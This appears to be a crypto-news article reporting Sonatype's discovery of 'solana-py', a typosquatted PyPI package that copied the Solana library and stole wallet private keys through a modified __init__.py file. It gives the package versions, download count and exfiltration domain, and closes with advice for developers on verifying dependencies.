Cybersecurity researchers have uncovered a malicious package on the Python Package Index (PyPI) that was disguised as a legitimate Solana blockchain library. Instead of performing its claimed function, the package was designed to steal private keys from users’ cryptocurrency wallets. The actual Solana Python API project on GitHub is called “solana-py”, but it is named “solana” on PyPI. A threat actor took advantage of this small difference and uploaded a malicious package called ‘solana-py’ to the PyPI repository with the intention of passing it off as the genuine Solana package. The actual “solana-py” malicious package was downloaded 1,122 times before it was pulled from PyPI. They were released in versions 0.34.3, 0.34.4, and 0.34.5 which is very similar to the latest official ‘solana’
Topics:
Bilal Hassan considers the following as important: News, Security & Ransomware
This could be interesting, too:
Temitope Olatunji writes X Empire Unveils ‘Chill Phase’ Update: Community to Benefit from Expanded Tokenomics
Bhushan Akolkar writes Cardano Investors Continue to Be Hopeful despite 11% ADA Price Drop
Bena Ilyas writes Stablecoin Transactions Constitute 43% of Sub-Saharan Africa’s Volume
Chimamanda U. Martha writes Crypto Exchange ADEX Teams Up with Unizen to Enhance Trading Experience for Users
Cybersecurity researchers have uncovered a malicious package on the Python Package Index (PyPI) that was disguised as a legitimate Solana blockchain library. Instead of performing its claimed function, the package was designed to steal private keys from users’ cryptocurrency wallets.
The actual Solana Python API project on GitHub is called “solana-py”, but it is named “solana” on PyPI. A threat actor took advantage of this small difference and uploaded a malicious package called ‘solana-py’ to the PyPI repository with the intention of passing it off as the genuine Solana package.
The actual “solana-py” malicious package was downloaded 1,122 times before it was pulled from PyPI. They were released in versions 0.34.3, 0.34.4, and 0.34.5 which is very similar to the latest official ‘solana’ package 0.34.3. This close versioning was a strategy to mislead users searching for the right package to install.
This fake package included the majority of the authentic code from the Solana library but had one fatal change. An attacker planted an exploit in a specific file known as “__init__.py,” whose purpose was to draw Solana blockchain wallet keys from anybody who used the package.
The stolen information was then forwarded to a domain on Hugging Face Spaces called “treeprime-gen.hf[.]space” owned by the attacker. This is a common trend in which cybercriminals employ normal networks to commit their criminal activities as in this case of data theft.
Sonatype Warns of Dangerous PyPI Library Risks
This example reveals critical vulnerabilities in the software supply chain. Sonatype, the cybersecurity firm that discovered the danger, noted that legitimate libraries such as “solders” mentioned “solana-py” in the PyPI project description. This could have made developers download the package without their knowledge.
From Sonatype, Ax Sharma reported that anyone who uses the real ‘solders’ package on PyPI may accidentally install the typosquatting ‘solana-py’ and introduce a crypto stealer into their application. This does not only endanger the developer’s secrets but also the data of any user running the compromised software.
Ultimately, this event reveals that one has to be very careful when downloading software packages. Developers must always ensure that the libraries they use are authentic. In addition to this, they must also conduct security checks from time to time to identify possible threats. It prevents similar attacks in the future by being aware of the newly emerging cybersecurity threats and avoiding dependency on third-party packages.